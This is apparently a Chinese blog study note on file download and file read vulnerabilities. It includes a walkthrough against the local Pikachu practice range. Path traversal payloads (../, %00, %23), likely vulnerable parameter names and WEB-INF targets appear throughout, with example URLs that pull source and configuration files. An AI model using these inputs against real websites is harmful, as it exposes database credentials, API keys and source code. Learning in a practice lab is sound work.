文件下载,读取 原理,检测,利用,修复等
#利用
数据库配置文件下载或读取后续
接口密匙信息文件下载或读取后续
#文件名,参数值,目录符号
read.xxx?filename=
down.xxx?filename=
readfile.xxx?file=
downfile.xxx?file=
../ ..\ .\ ./等
%00 ? %23 %20 .等
&readpath=、&filepath=、&path=、&inputfile=、&url=、&data=、&readfile=、&menu=、META-INF= 、
WEB-INF
1.文件被解析,则是文件包含漏洞
2.显示源代码,则是文件读取漏洞
3.提示文件下载,则是文件下载漏洞
下载或文件读取漏洞:
对应文件:配置文件(数据库,平台,各种等)
#各种协议调用配合
pikachu靶场练习
1.进入靶场,找到文件下载
#直接复制图片下载地址
http://127.0.0.1/pikachu/vul/unsafedownload/execdownload.php?filename=kb.png
#再复制图片地址
http://127.0.0.1/pikachu/vul/unsafedownload/download/kb.png
#对比可知execdownload.php和download是位于同一unsafedownload目录下的,如果要下载execdownload.php,则要返回一级目录,即http://127.0.0.1/pikachu/vul/unsafedownload/execdownload.php?filename=/../execdownload.php
2. 下载文件
#下载根目录下index.php文件(猜测有)
#网站目录的获取:
---通过扫描工具爬行或者扫码地址
---通过URL报错查看(几率小)
---通过下载传参的脚步文件,去发现代码里面出现的文件路径,以及包含文件获取(这里为:execdownload.php)
----数据库配置文件下载或读取后续
#在之前下载的execdownload.php中发现了inc/function.php字样,猜测为某目录下存在,前后尝试一下,在pikachu/inc里
http://127.0.0.1/pikachu/vul/unsafedownload/execdownload.php?filename=/../../../inc/function.php
3. 文件下载漏洞可能出现的URL特点:
---文件名:
read.xxx?filename=
down.xxx?filename=
readfile.xxx?file=
downfile.xxx?file=
---参数值:
../ ..\ .\ ./等
%00 ? %23 %20 .等
---目录符号:
&readpath=、&filepath=、&path=、&inputfile=、&url=、&data=、&readfile=、&menu=、META-INF= 、
WEB-INF
4. Javaweb文件下载的代码解析 (这里不懂javaweb开发,所以不做分析)
标签:文件,execdownload,读取,..,WEB,xxx,php,下载 From: https://www.cnblogs.com/Zx770/p/17578617.html